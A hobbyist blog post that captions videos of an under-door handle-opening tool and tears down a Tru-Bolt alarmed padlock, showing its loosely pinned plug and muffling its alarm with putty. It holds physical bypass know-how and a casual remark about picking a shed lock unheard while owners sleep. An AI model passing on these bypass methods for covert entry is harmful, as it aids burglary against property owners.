<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzJgd7Sxn_pXer0EgSDDmTNIOv0Zg2TmludamTRrLr_XsISf3fMwCwQQsZQt9vbFN2Qel2TCdGYyBHjr-Ss7A' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
In this video you see what happens when your rope isn't at the point closest to the door, hence the redesign needed for the loop where the rope connects to more of a triangle.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dwm7qZaNx2BlBvHINIkwSt8hQxIw7sEImCDbeY0Cc6c5BvwMbyAQj9GawI4ECbQFp6h6vrUAoivV4H1aW4G3g' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In this video you see what happens if you don't keep control of the rope. It gets wound around the tool and then you can't get it over the handle.<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dymp-5neZbzwCJhw9sZ-ASF2pLUn4b2KZOZDDFpsFWtG4N7uNJ2D-cS3rmziKfz9mYkaHYyEcT-7zCEwFYz2g' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
And finally, victory. Like I said, not an overly complicated tool, but there are some things you need to keep in mind. The reason I had such a difficult time maneuvering the tool under the door is that this particular door has about half the space that the rest of the doors have between it and the floor. Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-68494032841954412222012-08-30T07:53:00.000-10:002012-08-30T07:53:29.882-10:00Tru-Bolt Alarmed PadlockSo while I was out picking up some material for a project I happened to run across this padlock.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIkpJO2Xa_MFthXMsjQkdJkqkxX01bD4_HhINPBVU-zCsjbcSKwdPHkmX7M7YagiWHO03cYLwmI76YDc10MMaMAcZ5Vg1dMqPZH5zJcPd6PfTmRBaLEBdInBmk8fk7izDjPkuvRmU75OU/s1600/Lies3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIkpJO2Xa_MFthXMsjQkdJkqkxX01bD4_HhINPBVU-zCsjbcSKwdPHkmX7M7YagiWHO03cYLwmI76YDc10MMaMAcZ5Vg1dMqPZH5zJcPd6PfTmRBaLEBdInBmk8fk7izDjPkuvRmU75OU/s320/Lies3.jpg" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit53IL5NxkScX0IC7VhiIRzePYMjO1uk2b6B2CsPfVHLOGfpiaZpCjTQKffF2Kz3upWRx4cFOEjH4u_dL9g8g2fhU6rxgM8MeorbFCJD7wCQ7_CQyO_-0CFfayJnxNM89QaZGmU0aeiF8/s1600/Full.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit53IL5NxkScX0IC7VhiIRzePYMjO1uk2b6B2CsPfVHLOGfpiaZpCjTQKffF2Kz3upWRx4cFOEjH4u_dL9g8g2fhU6rxgM8MeorbFCJD7wCQ7_CQyO_-0CFfayJnxNM89QaZGmU0aeiF8/s320/Full.jpg" width="310" /></a></div>
<br />
I thought to myself, well, it has an unusual key, it has a tamper alarm, it's about $12... I need to play with this right now.<br />
<br />
After reading the write up it has on it's packaging I was very excited to begin attempting to defeat this lock.<br />
<br />
Here's what Tru-Bolt has to say about it's product:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzAWVCUeiNdfWn8JxhFOsLtF4N-7IHLSRm7ya-8_2le8prcjxjY_eZcRMnarPBl9pJn3cj_6ZEtboj6MAITcgZ1VvepkfQCH6gLL0MW3H6jQbGtYAOOul3MWu5drKUmf8hGwXSORE2Q4/s1600/Lies1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzAWVCUeiNdfWn8JxhFOsLtF4N-7IHLSRm7ya-8_2le8prcjxjY_eZcRMnarPBl9pJn3cj_6ZEtboj6MAITcgZ1VvepkfQCH6gLL0MW3H6jQbGtYAOOul3MWu5drKUmf8hGwXSORE2Q4/s400/Lies1.jpg" width="248" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiNnA8CT25c7NjfDgcoL_QzjvNeHGHqmyAY68l0lawKwoPNyLtBcXpI2FA63fS-2u-qnyZYrdrYYpgC20sUpNEgeuJRJk_ZY2cf4XHiY5WSGopZwt9vbugndw66ZaPJwl7Y0y_SRGGE0s/s1600/Lies2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiNnA8CT25c7NjfDgcoL_QzjvNeHGHqmyAY68l0lawKwoPNyLtBcXpI2FA63fS-2u-qnyZYrdrYYpgC20sUpNEgeuJRJk_ZY2cf4XHiY5WSGopZwt9vbugndw66ZaPJwl7Y0y_SRGGE0s/s400/Lies2.jpg" width="246" /></a></div>
<br />
This is the keyway and key, not much room to get a pick in there.:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdXhF56ysSUdR56afFS8bRC0-4vLwuLqMF3FKG-EBNsphPKDO3Da8J2rvUZJ0rEnnfT2vx7W3ebjyC5UCHTqlyDIVcrklMn-yJ_t-YINXuSoyPggHY92JGVUxw_K5uA9bO-vuALOyi2U0/s1600/Full-Side.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdXhF56ysSUdR56afFS8bRC0-4vLwuLqMF3FKG-EBNsphPKDO3Da8J2rvUZJ0rEnnfT2vx7W3ebjyC5UCHTqlyDIVcrklMn-yJ_t-YINXuSoyPggHY92JGVUxw_K5uA9bO-vuALOyi2U0/s320/Full-Side.jpg" width="147" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif1In2ayScZkcPGodObPJngCYd5usu3j2pr7nMN3jPqhK_gY3vgNsdvhgeDw93q_IuJNkhkAAOCrTqoL_-EOiFF_81fkUIBVxQ9dnQ_-9e5ErxgPMB3Vt-N-v1Xe-VlJ7ajYEjG3OLg6g/s1600/Key1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif1In2ayScZkcPGodObPJngCYd5usu3j2pr7nMN3jPqhK_gY3vgNsdvhgeDw93q_IuJNkhkAAOCrTqoL_-EOiFF_81fkUIBVxQ9dnQ_-9e5ErxgPMB3Vt-N-v1Xe-VlJ7ajYEjG3OLg6g/s320/Key1.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I thought that perhaps I had found a decent lock with a novel idea at a decent price.<br />
<br />
This is what happened when I opened it the second time:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbc7MrwiEcfDuN6kZGP6JvyOmat1N0jPzAh1O-MT6d5rvL6FD7tJg65ZxNiEhMstmcwO-9oMHUtKsQYMjG_piBlWK4KQ2W7nNgZocTYGz5mB2KZxxPrGgxvHlJimHQ4HNw_MpF5ZbOuk/s1600/FAIL1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbc7MrwiEcfDuN6kZGP6JvyOmat1N0jPzAh1O-MT6d5rvL6FD7tJg65ZxNiEhMstmcwO-9oMHUtKsQYMjG_piBlWK4KQ2W7nNgZocTYGz5mB2KZxxPrGgxvHlJimHQ4HNw_MpF5ZbOuk/s320/FAIL1.jpg" width="320" /></a></div>
I turned the key and then the whole lock plug came out.<br />
<br />
This here is the only thing that holds the lock in place:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RZlI-f7hRO-l3GBPB1UGZHcBVCV_Y0oDgUZlHrFDR4GdzygG9dbhSI48ID1FbLuEHVcnaEpwcNrOiOR0bTgWzWyhl6H7bruEmwl1WsndVgi5qmE4awatGrXgIJJ6CQC366KG0QoifPQ/s1600/THE_Pin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RZlI-f7hRO-l3GBPB1UGZHcBVCV_Y0oDgUZlHrFDR4GdzygG9dbhSI48ID1FbLuEHVcnaEpwcNrOiOR0bTgWzWyhl6H7bruEmwl1WsndVgi5qmE4awatGrXgIJJ6CQC366KG0QoifPQ/s320/THE_Pin.jpg" width="320" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnzspAhvK5G-3gYPvpsyitUgTywMCMqTLrd-6vPInkR5MwJjbt_Jo-ntyk3peiZQUk8n7amIHDapKWp93ZxVaUq9vn3RV7sevkIHJtjC-RN5WgZPASZ3tzAwXcb8gEVa7atlMr2tyoS8/s1600/THE_Pin2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnzspAhvK5G-3gYPvpsyitUgTywMCMqTLrd-6vPInkR5MwJjbt_Jo-ntyk3peiZQUk8n7amIHDapKWp93ZxVaUq9vn3RV7sevkIHJtjC-RN5WgZPASZ3tzAwXcb8gEVa7atlMr2tyoS8/s1600/THE_Pin2.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The ENTIRE security of this lock is defeated by this poor design</td></tr>
</tbody></table>
It's not tapped and threaded to lock it in place, it's not even glued in place, nothing, just rammed in there. Here's the corresponding spot on the lock where it gets inserted:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVprBAEfXN4McP_Ka527kpoFt_TDMXAsX2A4uggWG17wkpfvnoyJRVSdjTQXNJC6posr80HNQ-rGgvyElcWOrFp5uxjX6Qu-OAPyE7ksnJXMUUUrqwGB_tmVhaIcW83wHrsuGH0xEuzU/s1600/Plug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVprBAEfXN4McP_Ka527kpoFt_TDMXAsX2A4uggWG17wkpfvnoyJRVSdjTQXNJC6posr80HNQ-rGgvyElcWOrFp5uxjX6Qu-OAPyE7ksnJXMUUUrqwGB_tmVhaIcW83wHrsuGH0xEuzU/s320/Plug.jpg" width="320" /></a></div>
That's not a particularly deep drilling point, it doesn't mushroom out at the top, it's actually tappered to a point at the lowest spot. There's NOTHING to actually keep that pin in it's place. Since that's the ONLY thing holding the lock plug in place that causes a bit of a problem.<br />
<br />
I was pretty disappointed at that moment, this intriguing challenge ruined because some knucklehead didn't think about securing that pin.<br />
<br />
Spirit bent but not broken I carried on with the dissection of the lock.<br />
<br />
There is still the actual lock and the alarm.<br />
<br />
Since the lock itself is essentially useless I put that on a back burner for later and went about finding out how this tamper resistant portion worked.<br />
<br />
Let me start by saying that 110db (if that's actually how loud it is) is pretty damn loud. Ear splitting "OMG the earth is ending" loud. Needless to say the novelty of it going off did not extend to my family while I was playing with it. It was suggested that I make it stop doing that if I were to continue to occupy the house.<br />
<br />
Here's the internals of the alarm.<br />
<br />
It's really really loud.<br />
Seriously.<br />
<br />
Here's the bottom housing of the lock. It only holds the speaker, the contacts there connect to the battery pack and electronics that are housed in the lock body. It's attached by 2 screws that are accessible when you remove the shackle. <br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOSlZFqECjs2oukfc2THqcXp_QrlLMqEILYUFOGlzulP7bWMTrehh_mWGa8PKLl9NHfXuo7eh9uF7QUe7I0TEalvtrzAXJ8_2PevFvhTdpxkcGMN5z09GuFEM-Li1LFNvyBhMdbMIw9NQ/s1600/Speaker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOSlZFqECjs2oukfc2THqcXp_QrlLMqEILYUFOGlzulP7bWMTrehh_mWGa8PKLl9NHfXuo7eh9uF7QUe7I0TEalvtrzAXJ8_2PevFvhTdpxkcGMN5z09GuFEM-Li1LFNvyBhMdbMIw9NQ/s320/Speaker.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inside</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTNbNGqFVOf2N3Sl196JezA_0-UN1SsNoHJK2au2sBZ2Pv4WYSB1Zx6lGrlTdq86R3Yhdpz40jRByXg9bM1T6XJHVWajjupLSTh9uT8WEWa4td2Mnwvn4YEcCyoCwMg3PnargXXWvoUOA/s1600/Speaker_Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTNbNGqFVOf2N3Sl196JezA_0-UN1SsNoHJK2au2sBZ2Pv4WYSB1Zx6lGrlTdq86R3Yhdpz40jRByXg9bM1T6XJHVWajjupLSTh9uT8WEWa4td2Mnwvn4YEcCyoCwMg3PnargXXWvoUOA/s320/Speaker_Bottom.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Outside, also the bottom of the lock.</td></tr>
</tbody></table>
<br />
Here's the actual electronics:<br />
<br />
This is the battery pack, housing for the circuit board, and contacts that connect to the speaker. It's held in place by a large O ring that is pressed into a groove around the battery pack device and the lock body. This also helps weather proof it.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5EGO8nrUJlA2QyHbDQ7USXvt9fR7KFrXrNtidqJ-z4OcKVqpf9KbbzXvof86gqkjtgTeQ2ZaZTkhZ_Z0I1gpLvmLDyJU9LSETI0_aShannzCAAtG5VIj7Wsd0A0BgkwD-8rLGlBfKrU/s1600/Battery_Pack.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5EGO8nrUJlA2QyHbDQ7USXvt9fR7KFrXrNtidqJ-z4OcKVqpf9KbbzXvof86gqkjtgTeQ2ZaZTkhZ_Z0I1gpLvmLDyJU9LSETI0_aShannzCAAtG5VIj7Wsd0A0BgkwD-8rLGlBfKrU/s320/Battery_Pack.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Battery Pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpX1J2aocdqZhKKf_2s-SIC58r9rMqngmW8oR7MKiDJPHI3M0myVPw4qo9kRxC5iIIrekl0BhuHhoxLFPt6sAlh21Lo_eni-C990uw6zWJS_x5zLZdb4OOF_GMsscFk4lkjw5HDMFwZhU/s1600/Electronics.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpX1J2aocdqZhKKf_2s-SIC58r9rMqngmW8oR7MKiDJPHI3M0myVPw4qo9kRxC5iIIrekl0BhuHhoxLFPt6sAlh21Lo_eni-C990uw6zWJS_x5zLZdb4OOF_GMsscFk4lkjw5HDMFwZhU/s320/Electronics.jpg" width="244" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Other side of the battery pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY1l3bLUwoigxh7HWofk8L-Qg1hPFQfMWOqg-fH3hpQugkS_iMi1TTiElS-DhU6psSDrqX65Ol6CCiEeB_vqUbAa9QWnx-yrVJzEPqWGY-JoQzfoVpEyXgy9-SwngxaqggxE_B4dA0VYQ/s1600/Electronics2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY1l3bLUwoigxh7HWofk8L-Qg1hPFQfMWOqg-fH3hpQugkS_iMi1TTiElS-DhU6psSDrqX65Ol6CCiEeB_vqUbAa9QWnx-yrVJzEPqWGY-JoQzfoVpEyXgy9-SwngxaqggxE_B4dA0VYQ/s320/Electronics2.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bottom of the circuit board on top of the battery pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF_WkS1aV8VDoNIDR8GPb4BRYkLyRPsv376Cc4ZxTeUeRKMX44cszdcgglf-Qnxx-92R2h2ttnSoTzW7OnKHcy8z9JUOl5FHC-y-qct4yUsOyk7gehSGtLs0N6XU6uLPg4bb93X29iRDY/s1600/Electronics3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF_WkS1aV8VDoNIDR8GPb4BRYkLyRPsv376Cc4ZxTeUeRKMX44cszdcgglf-Qnxx-92R2h2ttnSoTzW7OnKHcy8z9JUOl5FHC-y-qct4yUsOyk7gehSGtLs0N6XU6uLPg4bb93X29iRDY/s320/Electronics3.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Another angle </td></tr>
</tbody></table>
Here is the ball for the switch that either enables or disables the alarm, it's a simple contact switch housed in a rubber / silicone housing inside the lock, above the battery pack.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy_X6xEfHHAoTOXkYxKTbPb8BksSjTcX6_S4XDXKFqczNLpShxNnHmASYkVzRjOGbBp3XFkh436GRNGiD7S-q9nJRCjED1slV1HL2LauXEqKn_EkNuNv9cRxG6dLohO4cCO8bdT5rnNw/s1600/Alarm_Arming_Button.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy_X6xEfHHAoTOXkYxKTbPb8BksSjTcX6_S4XDXKFqczNLpShxNnHmASYkVzRjOGbBp3XFkh436GRNGiD7S-q9nJRCjED1slV1HL2LauXEqKn_EkNuNv9cRxG6dLohO4cCO8bdT5rnNw/s320/Alarm_Arming_Button.jpg" width="320" /></a></div>
<br />
As you can see here the shackle has a recessed area on one side. If you insert it with the recessed area in the hole with the switch the alarm is not active. The contact is not pressed, the circuit is open. If you insert the side that does not have the recess cut the ball is pressed into the contact and the circuit is closed and the alarm is then active.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7LYEIbHoxpaMPFAslZ8zk9gXB1nLbso-qNTwAkqJCEMOaOdus1K6xneckgjS04n-AFnXIaQ1fXNTEdp1wfAlXcylDDq4NAuj59oLhw1k2waXBlESbD5glIHb5YJUDe25Yd_w6ULpSfc/s1600/Shackle1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7LYEIbHoxpaMPFAslZ8zk9gXB1nLbso-qNTwAkqJCEMOaOdus1K6xneckgjS04n-AFnXIaQ1fXNTEdp1wfAlXcylDDq4NAuj59oLhw1k2waXBlESbD5glIHb5YJUDe25Yd_w6ULpSfc/s320/Shackle1.jpg" width="299" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVguDkkK1jWBEpACO3IK0vsfza0wk04eDMiOhkWpv1zGEMG_9xdtleyX4d1sK9F6q7GnwseHA2phYIMN4rtrjlHD65788ehzbShgpfoAUHmobi3Qt4NLbHuEzFQiXJ1gEXxKZY25VY8dI/s1600/Shackle2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVguDkkK1jWBEpACO3IK0vsfza0wk04eDMiOhkWpv1zGEMG_9xdtleyX4d1sK9F6q7GnwseHA2phYIMN4rtrjlHD65788ehzbShgpfoAUHmobi3Qt4NLbHuEzFQiXJ1gEXxKZY25VY8dI/s320/Shackle2.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Here's the lock and the part the interacts with the shackle to prevent it's unintended removal from the lock:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqUniakUYJtS6vIF-41_YPBHPMnRdL5WG8Inc8Xjj8FPJ38D7_I9cEBwNF2CjSnJcQMdq9V0LYZ6EQC-D4bH-5Ukltr0WFgyJLjYsVh1zjyMJWZJoBpvz3qUtR00GjKLzTWv_dLXhWjI/s1600/Cam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqUniakUYJtS6vIF-41_YPBHPMnRdL5WG8Inc8Xjj8FPJ38D7_I9cEBwNF2CjSnJcQMdq9V0LYZ6EQC-D4bH-5Ukltr0WFgyJLjYsVh1zjyMJWZJoBpvz3qUtR00GjKLzTWv_dLXhWjI/s320/Cam.jpg" width="320" /></a></div>
<br />
<br />
<br />
Insert the key and turn and the little wing there moves out of the path of the groove on the outside of the shackle. <br />
<br />
On the product package it touts that the alarm has an "Anti-muffle design: alarm sound can not be concealed"<br />
<br />
That, friends, is a lie.<br />
<br />
BEHOLD!!! My magic sound dampening putty<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLG48lrUbYsyE3_nP4WmSuQH-j50wOnaqviOv_vDOUpoce3X8hUIchh0ABFZwk9i_OOQKzRxgBH8EEefeyCYOr7EI-n16g9ypvob7ryJd_5Z1eYff1hJpHvad77z_L3AGvHWpTEpPa9as/s1600/Magic_Audio_Muting_Material.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLG48lrUbYsyE3_nP4WmSuQH-j50wOnaqviOv_vDOUpoce3X8hUIchh0ABFZwk9i_OOQKzRxgBH8EEefeyCYOr7EI-n16g9ypvob7ryJd_5Z1eYff1hJpHvad77z_L3AGvHWpTEpPa9as/s320/Magic_Audio_Muting_Material.jpg" width="251" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">It's actually just magnetic silly putty, but it works really really good.</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
<br />
Apply it to the lock as shown:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieU4KapNr1IN4IZGsXALi7E8lgG10xkJUazMYecTgdy3zoAYKhD4VDc1GnLWoC39yVwaRpEC7oJ2C0Iue6ztG8DqHel-KK_q71CSB5zKiYxYYM3lwMe63UTOarnTzi8mdgXpz0Q7QeNoQ/s1600/Audio_Bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieU4KapNr1IN4IZGsXALi7E8lgG10xkJUazMYecTgdy3zoAYKhD4VDc1GnLWoC39yVwaRpEC7oJ2C0Iue6ztG8DqHel-KK_q71CSB5zKiYxYYM3lwMe63UTOarnTzi8mdgXpz0Q7QeNoQ/s320/Audio_Bypass.jpg" width="293" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMQSywMCKE2xTvI4YmpOJh8CmcCVrjUrFJpm87xiwElfSSBdKamr-JBUPSDcDLzI3bNyP8_psg5qoDujqqaQV4ZG2_Iwhls6XDl_R40ypz8y1SuXLtVlTppzlbZMybFBD6u_jO5D1wEPY/s1600/Audio_Bypass2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMQSywMCKE2xTvI4YmpOJh8CmcCVrjUrFJpm87xiwElfSSBdKamr-JBUPSDcDLzI3bNyP8_psg5qoDujqqaQV4ZG2_Iwhls6XDl_R40ypz8y1SuXLtVlTppzlbZMybFBD6u_jO5D1wEPY/s320/Audio_Bypass2.jpg" width="320" /></a></div>
Once this is in place that lions roar of an ear shattering sound is reduced to a kittens squeak. It's completely tolerable. More along the lines of a kids toy buried under some stuffed animals than a rampaging 110 db alarm.<br />
<br />
Part of the reason this works so well is that they've weatherproofed the lock so well to keep the internals dry. The only place loud sound can get out is at the vents on the bottom. VERY minimal sound can escape through the rest of the lock. Had they done a poor-er job of making it water tight you wouldn't be able to muffle it as well and that 110 db would be leaking out of everywhere.<br />
They did one thing right, and it makes the lock worse.<br />
<br />
I would feel comfortable picking this lock on a shed in someone's back yard while they slept in their house with the putty over the lock, there's no way they would hear it.<br />
<br />
I haven't tried it yet, but I bet submerging the vents in water would also muffle the sound greatly. I also have an idea about using a paper clip to press against the speaker or puncturing the speaker, thus rendering the alarm function null and void. I'll do that later, after I'm done with the other experiments.<br />
<br />
Alright so we now know we can muffle the sound. But what exactly does it take to set off the alarm, how sensitive is it? Well if I knew more about circuitry I could probably tell you. If anyone can give me some insight on the components on the circuit board that would be awesome, just leave something in the comments.<br />
<br />
As it stands all I can do it just hit and shake the thing to see if it would go off. Given the lack of support I was receiving that night in my journey towards knowledge (did I mention that alarm is REALLY loud??) (Really really loud) (DAMN that thing is loud) I had to rig up a visual method to find out if the alarm was being tripped.<br />
<br />
